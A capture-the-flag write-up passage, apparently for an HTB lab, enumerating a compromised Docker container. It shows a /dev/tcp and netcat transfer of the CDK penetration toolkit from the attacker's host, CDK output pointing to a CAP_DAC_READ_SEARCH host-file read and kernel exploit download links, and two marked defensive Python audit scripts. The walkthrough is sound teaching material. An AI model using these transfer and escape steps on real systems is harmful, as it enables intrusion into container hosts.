Docker Container


After successfully making lateral movement into the Docker container at 172.17.0.3, I started searching for clues to break out.

root@c150397ccd63:/app/bundle/programs/server# find . -name docker* -ls -type f 2>/dev/null
   279302      8 -rwxr-xr-x   1 rocketchat rocketchat     4218 Oct 26  1985 ./node_modules/node-gyp/test/docker.sh
   527000      4 drwxr-xr-x   2 rocketchat rocketchat     4096 Dec 19  2020 ./npm/node_modules/codemirror/mode/dockerfile
   527001      8 -rw-rw-r--   1 rocketchat rocketchat     4739 Dec 19  2020 ./npm/node_modules/codemirror/mode/dockerfile/dockerfile.js
   528986      4 -rw-rw-r--   1 rocketchat rocketchat      523 Dec 19  2020 ./npm/node_modules/highlight.js/lib/languages/dockerfile.js
 

I don’t see any Docker configuration files. It is entirely possible that those were removed for security.

In this case, I’d need other ways to enumerate the container.

cdk - Zero Dependency Container Penetration Toolkit


CDK is an open-sourced container penetration toolkit, designed for offering stable exploitation in different slimmed containers without any OS dependency. It comes with useful net-tools and many powerful PoCs/EXPs and helps you to escape container and take over K8s cluster easily.

root@c150397ccd63:/root# cat < /dev/tcp/10.10.14.9/999 > cdk
 
┌──(kali㉿kali)-[~/archive/htb/labs/talkative]
└─$ nc -lvp 999 < cdk
listening on [any] 999 ...
connect to [10.10.14.9] from talkative.htb [10.10.11.155] 56002

Delivery complete

root@c150397ccd63:/root# chmod 755 ./cdk
 
root@c150397ccd63:/root# ./cdk evaluate --full
CDK (Container DucK)
CDK Version(GitCommit): d9ab55702036c28e793378cc47605e21206dfef1
Zero-dependency cloudnative k8s/docker/serverless penetration toolkit by cdxy & neargle
Find tutorial, configuration and use-case in https://github.com/cdk-team/CDK/
 
[  Information Gathering - System Info  ]
2023/06/08 22:29:00 current dir: /root
2023/06/08 22:29:00 current user: root uid: 0 gid: 0 home: /root
2023/06/08 22:29:00 hostname: c150397ccd63
2023/06/08 22:29:00 debian debian 10.10 kernel: 5.4.0-81-generic
2023/06/08 22:29:00 Setuid files found:
	/usr/bin/chfn
	/usr/bin/chsh
	/usr/bin/gpasswd
	/usr/bin/newgrp
	/usr/bin/passwd
	/bin/mount
	/bin/su
	/bin/umount
 
[  Information Gathering - Services  ]
2023/06/08 22:29:00 sensitive env found:
	DEPLOY_METHOD=docker-official
 
[  Information Gathering - Commands and Capabilities  ]
2023/06/08 22:29:00 available commands:
	find,node,npm,apt,dpkg,mount,fdisk,base64,perl
2023/06/08 22:29:00 Capabilities hex of Caps(CapInh|CapPrm|CapEff|CapBnd|CapAmb):
	CapInh:	0000000000000000
	CapPrm:	00000000a80425fd
	CapEff:	00000000a80425fd
	CapBnd:	00000000a80425fd
	CapAmb:	0000000000000000
	Cap decode: 0x00000000a80425fd = CAP_CHOWN,CAP_DAC_READ_SEARCH,CAP_FOWNER,CAP_FSETID,CAP_KILL,CAP_SETGID,CAP_SETUID,CAP_SETPCAP,CAP_NET_BIND_SERVICE,CAP_NET_RAW,CAP_SYS_CHROOT,CAP_MKNOD,CAP_AUDIT_WRITE,CAP_SETFCAP
	Added capability list: CAP_DAC_READ_SEARCH
[*] Maybe you can exploit the Capabilities below:
[!] CAP_DAC_READ_SEARCH enabled. You can read files from host. Use 'cdk run cap-dac-read-search' ... for exploitation.
 
[  Information Gathering - Mounts  ]
0:74 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/SJ7L7M7IXKP2LYEKIS4QTXWMB2:/var/lib/docker/overlay2/l/V56NO5353KGHEUPU2G64UYICZS:/var/lib/docker/overlay2/l/57PYNL7JWAUZ2ZEF5CM7JKTH2Y:/var/lib/docker/overlay2/l/K4DCIUMHCNYT3RFVQSR7KCCWLJ:/var/lib/docker/overlay2/l/LLNI6XKILGAYVK3VSFPKZQC4NI,upperdir=/var/lib/docker/overlay2/5de14f4c9bdeaf0f8a19d03adcc2d28ccc97655bb5bc5f888490c184d2ad70dc/diff,workdir=/var/lib/docker/overlay2/5de14f4c9bdeaf0f8a19d03adcc2d28ccc97655bb5bc5f888490c184d2ad70dc/work,xino=off
0:76 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
0:77 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:78 / /dev/pts rw,nosuid,noexec,relatime - devpts devpts rw,gid=5,mode=620,ptmxmode=666
0:79 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
0:80 / /sys/fs/cgroup rw,nosuid,nodev,noexec,relatime - tmpfs tmpfs rw,mode=755
0:31 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
0:34 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/hugetlb ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,hugetlb
0:35 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/cpu,cpuacct ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpu,cpuacct
0:36 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/perf_event ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,perf_event
0:37 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/blkio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,blkio
0:38 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/memory ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,memory
0:39 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/net_cls,net_prio ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,net_cls,net_prio
0:40 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/freezer ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,freezer
0:41 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/devices ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,devices
0:42 / /sys/fs/cgroup/rdma ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,rdma
0:43 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/pids ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,pids
0:44 /docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726 /sys/fs/cgroup/cpuset ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,cpuset
0:75 / /dev/mqueue rw,nosuid,nodev,noexec,relatime - mqueue mqueue rw
0:81 / /dev/shm rw,nosuid,nodev,noexec,relatime - tmpfs shm rw,size=65536k
253:0 /var/lib/docker/volumes/ae091a7d3837f61e227c2d406f85a574d8a9e97f5909929902d7c20ce630deae/_data /app/uploads rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726/resolv.conf /etc/resolv.conf rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726/hostname /etc/hostname rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
253:0 /var/lib/docker/containers/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
0:76 /bus /proc/bus ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /fs /proc/fs ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /irq /proc/irq ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
0:76 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
0:89 / /proc/acpi ro,relatime - tmpfs tmpfs ro
0:77 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:77 /null /proc/keys rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:77 /null /proc/timer_list rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:77 /null /proc/sched_debug rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
0:90 / /proc/scsi ro,relatime - tmpfs tmpfs ro
0:91 / /sys/firmware ro,relatime - tmpfs tmpfs ro
 
[  Information Gathering - Net Namespace  ]
	container net namespace isolated.
 
[  Information Gathering - Sysctl Variables  ]
2023/06/08 22:29:00 net.ipv4.conf.all.route_localnet = 0
 
[  Information Gathering - DNS-Based Service Discovery  ]
error when requesting coreDNS: lookup any.any.svc.cluster.local. on 1.1.1.1:53: read udp 172.17.0.3:37437->1.1.1.1:53: i/o timeout
error when requesting coreDNS: lookup any.any.any.svc.cluster.local. on 1.1.1.1:53: read udp 172.17.0.3:50775->1.1.1.1:53: i/o timeout
 
[  Discovery - K8s API Server  ]
2023/06/08 22:29:20 checking if api-server allows system:anonymous request.
err found while searching local K8s apiserver addr.:
err: cannot find kubernetes api host in ENV
	api-server forbids anonymous request.
	response:
 
[  Discovery - K8s Service Account  ]
load K8s service account token error.:
open /var/run/secrets/kubernetes.io/serviceaccount/token: no such file or directory
 
[  Discovery - Cloud Provider Metadata API  ]
2023/06/08 22:29:21 failed to dial Alibaba Cloud API.
2023/06/08 22:29:22 failed to dial Azure API.
2023/06/08 22:29:23 failed to dial Google Cloud API.
2023/06/08 22:29:24 failed to dial Tencent Cloud API.
2023/06/08 22:29:25 failed to dial OpenStack API.
2023/06/08 22:29:26 failed to dial Amazon Web Services (AWS) API.
2023/06/08 22:29:27 failed to dial ucloud API.
 
[  Exploit Pre - Kernel Exploits  ]
2023/06/08 22:29:27 refer: https://github.com/mzet-/linux-exploit-suggester
[+] [CVE-2021-27365] linux-iscsi
 
   Details: https://blog.grimm-co.com/2021/03/new-old-bugs-in-linux-kernel.html
   Exposure: less probable
   Tags: RHEL=8
   Download URL: https://codeload.github.com/grimm-co/NotQuite0DayFriday/zip/trunk
   Comments: CONFIG_SLAB_FREELIST_HARDENED must not be enabled
 
[+] [CVE-2021-22555] Netfilter heap out-of-bounds write
 
   Details: https://google.github.io/security-research/pocs/linux/cve-2021-22555/writeup.html
   Exposure: less probable
   Tags: ubuntu=20.04{kernel:5.8.0-*}
   Download URL: https://raw.githubusercontent.com/google/security-research/master/pocs/linux/cve-2021-22555/exploit.c
   ext-url: https://raw.githubusercontent.com/bcoles/kernel-exploits/master/CVE-2021-22555/exploit.c
   Comments: ip_tables kernel module must be loaded
 
 
 
[  Information Gathering - Sensitive Files  ]
	.dockerenv - /.dockerenv
	/config.json - /app/bundle/programs/server/config.json
	.token - /app/bundle/programs/server/npm/node_modules/grpc/node_modules/protobufjs/docs/ProtoBuf.DotProto.Tokenizer.html
	/config.json - /app/bundle/programs/server/npm/node_modules/url-polyfill/tests/config.json
	/.bashrc - /etc/skel/.bashrc
	/.bashrc - /root/.bashrc
	/.bash_history - /tmp/.bash_history
 
[  Information Gathering - ASLR  ]
2023/06/08 22:29:31 /proc/sys/kernel/randomize_va_space file content: 2
2023/06/08 22:29:31 ASLR is enabled.
 
[  Information Gathering - Cgroups  ]
2023/06/08 22:29:31 /proc/1/cgroup file content:
	12:cpuset:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	11:pids:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	10:rdma:/
	9:devices:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	8:freezer:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	7:net_cls,net_prio:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	6:memory:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	5:blkio:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	4:perf_event:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	3:cpu,cpuacct:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	2:hugetlb:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	1:name=systemd:/docker/c150397ccd634de99b32847ec1df1342c8a8107f002bb12ec7460ae6aa93e726
	0::/system.slice/containerd.service
2023/06/08 22:29:31 /proc/self/cgroup file added content (compare pid 1) :
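
The mount listing in the output above is the /proc/self/mountinfo data with the leading mount-ID and parent-ID fields dropped (each line starts at the major:minor field). The following Python, added here as an example and not part of the writeup or of CDK, parses the full mountinfo format and sorts each entry into one of four buckets: the overlay root, kernel pseudo-filesystems, paths that Docker masks by binding /dev/null or an empty read-only tmpfs over them (/proc/kcore, /proc/acpi, /sys/firmware), and mounts backed by a real host block device, which is where a writable path into the host filesystem would show up. The sample text is constructed from a subset of the entries above, with mount IDs, a shortened container ID (`CID`) and volume ID (`VOL`) added; those placeholders are not the page's values.

```python
# Added example (not from the writeup or from CDK): classify /proc/self/mountinfo
# entries so that host-backed and masked paths stand out when auditing a container.
# mountinfo fields: id parent major:minor root mount_point options [optional...] - fstype source super_options

KERNEL_FS = {"proc", "sysfs", "cgroup", "cgroup2", "devpts", "mqueue", "tmpfs", "overlay"}


def parse_mountinfo(text):
    """Parse mountinfo lines into dicts. Optional fields end at the ' - ' separator."""
    entries = []
    for line in text.splitlines():
        if not line.strip():
            continue
        left, _, right = line.partition(" - ")
        lf = left.split()
        rf = right.split(None, 2)
        if len(lf) < 6 or len(rf) < 3:
            raise ValueError(f"unparseable mountinfo line: {line!r}")
        entries.append({
            "mount_id": int(lf[0]), "parent_id": int(lf[1]), "dev": lf[2],
            "root": lf[3], "mount_point": lf[4],
            "options": set(lf[5].split(",")),
            "fstype": rf[0], "source": rf[1], "super_options": rf[2],
        })
    return entries


def classify(entry):
    """Label an entry: overlay root, masked kernel path, kernel fs, or host-backed."""
    mp, root, fs = entry["mount_point"], entry["root"], entry["fstype"]
    if fs == "overlay" and mp == "/":
        return "overlay-root"
    if mp.startswith("/proc/") and root == "/null":
        return "masked"            # /dev/null bound over a proc file (Docker's MaskedPaths)
    if mp.startswith(("/proc/", "/sys/")) and fs == "tmpfs" and "ro" in entry["options"]:
        return "masked"            # empty read-only tmpfs hiding a directory
    if fs in KERNEL_FS:
        return "kernel"
    return "host-backed"           # anything else is a path from a real device on the host


def audit(text):
    """Summarise what an auditor cares about: host-backed mounts (and which are writable),
    masked paths, and the read-only proc subtrees Docker sets up by default."""
    report = {"host_backed": [], "writable_host": [], "masked": [], "readonly_proc": []}
    for e in parse_mountinfo(text):
        kind = classify(e)
        if kind == "host-backed":
            report["host_backed"].append((e["root"], e["mount_point"], e["source"]))
            if "rw" in e["options"]:
                report["writable_host"].append(e["mount_point"])
        elif kind == "masked":
            report["masked"].append(e["mount_point"])
        if e["fstype"] == "proc" and e["mount_point"] != "/proc" and "ro" in e["options"]:
            report["readonly_proc"].append(e["mount_point"])
    return report


# Constructed sample: a subset of the CDK mount listing, with mount ID and parent ID
# fields added in front and the long container/volume IDs replaced by CID/VOL placeholders.
SAMPLE = """\
1 0 0:74 / / rw,relatime - overlay overlay rw,lowerdir=/var/lib/docker/overlay2/l/A:/var/lib/docker/overlay2/l/B,upperdir=/var/lib/docker/overlay2/x/diff,workdir=/var/lib/docker/overlay2/x/work
2 1 0:76 / /proc rw,nosuid,nodev,noexec,relatime - proc proc rw
3 1 0:77 / /dev rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
4 1 0:79 / /sys ro,nosuid,nodev,noexec,relatime - sysfs sysfs ro
5 4 0:31 /docker/CID /sys/fs/cgroup/systemd ro,nosuid,nodev,noexec,relatime - cgroup cgroup rw,xattr,name=systemd
6 1 253:0 /var/lib/docker/volumes/VOL/_data /app/uploads rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
7 1 253:0 /var/lib/docker/containers/CID/hosts /etc/hosts rw,relatime - ext4 /dev/mapper/ubuntu--vg-ubuntu--lv rw
8 2 0:76 /sys /proc/sys ro,nosuid,nodev,noexec,relatime - proc proc rw
9 2 0:76 /sysrq-trigger /proc/sysrq-trigger ro,nosuid,nodev,noexec,relatime - proc proc rw
10 2 0:77 /null /proc/kcore rw,nosuid - tmpfs tmpfs rw,size=65536k,mode=755
11 2 0:89 / /proc/acpi ro,relatime - tmpfs tmpfs ro
12 1 0:91 / /sys/firmware ro,relatime - tmpfs tmpfs ro
"""

if __name__ == "__main__":
    import pprint
    # Replace SAMPLE with open("/proc/self/mountinfo").read() to audit a live container.
    pprint.pprint(audit(SAMPLE))
```

On the sample, the only host-backed mounts are the named volume on /app/uploads and the per-container files Docker manages (/etc/hosts and friends), so this container's view of the host filesystem is limited to what the operator chose to expose; /proc/sys and /proc/sysrq-trigger are read-only and the usual kernel paths are masked, which is Docker's default hardening.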

Executing CDK

CAP_DAC_READ_SEARCH is available
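
CDK decodes the capability hex for you and reports what was added relative to Docker's default set, but it does not say what was taken away. The following Python, added as an example and not part of the writeup or of CDK, parses the Cap* lines of /proc/<pid>/status, decodes the bitmask with the bit numbers from the kernel's capability.h, and diffs it in both directions against Docker's default capability set, so an auditor sees that this container was given CAP_DAC_READ_SEARCH in place of CAP_DAC_OVERRIDE. The status fragment is constructed, with the same hex values as the CDK output above.

```python
# Added example (not from the writeup or from CDK): decode a Linux capability bitmask
# and compare it with Docker's default set, reporting both added and dropped capabilities.

# Capability bit numbers as in include/uapi/linux/capability.h (index == bit number).
CAP_NAMES = [
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_DAC_READ_SEARCH", "CAP_FOWNER",
    "CAP_FSETID", "CAP_KILL", "CAP_SETGID", "CAP_SETUID", "CAP_SETPCAP",
    "CAP_LINUX_IMMUTABLE", "CAP_NET_BIND_SERVICE", "CAP_NET_BROADCAST",
    "CAP_NET_ADMIN", "CAP_NET_RAW", "CAP_IPC_LOCK", "CAP_IPC_OWNER",
    "CAP_SYS_MODULE", "CAP_SYS_RAWIO", "CAP_SYS_CHROOT", "CAP_SYS_PTRACE",
    "CAP_SYS_PACCT", "CAP_SYS_ADMIN", "CAP_SYS_BOOT", "CAP_SYS_NICE",
    "CAP_SYS_RESOURCE", "CAP_SYS_TIME", "CAP_SYS_TTY_CONFIG", "CAP_MKNOD",
    "CAP_LEASE", "CAP_AUDIT_WRITE", "CAP_AUDIT_CONTROL", "CAP_SETFCAP",
    "CAP_MAC_OVERRIDE", "CAP_MAC_ADMIN", "CAP_SYSLOG", "CAP_WAKE_ALARM",
    "CAP_BLOCK_SUSPEND", "CAP_AUDIT_READ", "CAP_PERFMON", "CAP_BPF",
    "CAP_CHECKPOINT_RESTORE",
]

# Docker's default capability set for a non-privileged container.
DOCKER_DEFAULT_CAPS = {
    "CAP_CHOWN", "CAP_DAC_OVERRIDE", "CAP_FSETID", "CAP_FOWNER", "CAP_MKNOD",
    "CAP_NET_RAW", "CAP_SETGID", "CAP_SETUID", "CAP_SETFCAP", "CAP_SETPCAP",
    "CAP_NET_BIND_SERVICE", "CAP_SYS_CHROOT", "CAP_KILL", "CAP_AUDIT_WRITE",
}


def decode_caps(hex_mask):
    """Turn a CapEff/CapPrm/CapBnd hex string into the set of capability names."""
    mask = int(hex_mask, 16)
    names = set()
    for bit in range(mask.bit_length()):
        if (mask >> bit) & 1:
            names.add(CAP_NAMES[bit] if bit < len(CAP_NAMES) else f"CAP_UNKNOWN_{bit}")
    return names


def parse_status_caps(status_text):
    """Collect the Cap* lines of /proc/<pid>/status into {field: hex string}."""
    caps = {}
    for line in status_text.splitlines():
        if line.startswith("Cap"):
            key, _, value = line.partition(":")
            caps[key.strip()] = value.strip()
    return caps


def diff_against_docker_default(hex_mask):
    """Report what this mask grants beyond, and lacks from, Docker's default set."""
    have = decode_caps(hex_mask)
    return {
        "added": sorted(have - DOCKER_DEFAULT_CAPS),
        "dropped": sorted(DOCKER_DEFAULT_CAPS - have),
    }


# Constructed /proc/self/status fragment; the hex values match the CDK output above.
SAMPLE_STATUS = """\
Name:\tbash
CapInh:\t0000000000000000
CapPrm:\t00000000a80425fd
CapEff:\t00000000a80425fd
CapBnd:\t00000000a80425fd
CapAmb:\t0000000000000000
"""


def audit(status_text=SAMPLE_STATUS):
    """Decode the effective set and diff it; also flag whether the bounding set is wider."""
    caps = parse_status_caps(status_text)
    report = diff_against_docker_default(caps["CapEff"])
    report["effective"] = sorted(decode_caps(caps["CapEff"]))
    # A bounding set larger than the effective set means more could be regained via setcap/exec.
    report["bounding_exceeds_effective"] = bool(decode_caps(caps["CapBnd"]) - decode_caps(caps["CapEff"]))
    return report


if __name__ == "__main__":
    # Replace SAMPLE_STATUS with open("/proc/self/status").read() to audit a live process.
    r = audit()
    print("effective:", ", ".join(r["effective"]))
    print("added vs docker default:  ", r["added"])
    print("dropped vs docker default:", r["dropped"])
```

The interesting output is the pair of diffs: a `--cap-add`/`--cap-drop` combination on the container shows up as one name in each list, which is exactly the trade (DAC_READ_SEARCH for DAC_OVERRIDE) that this box was configured with.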

Moving on to the Privilege Escalation phase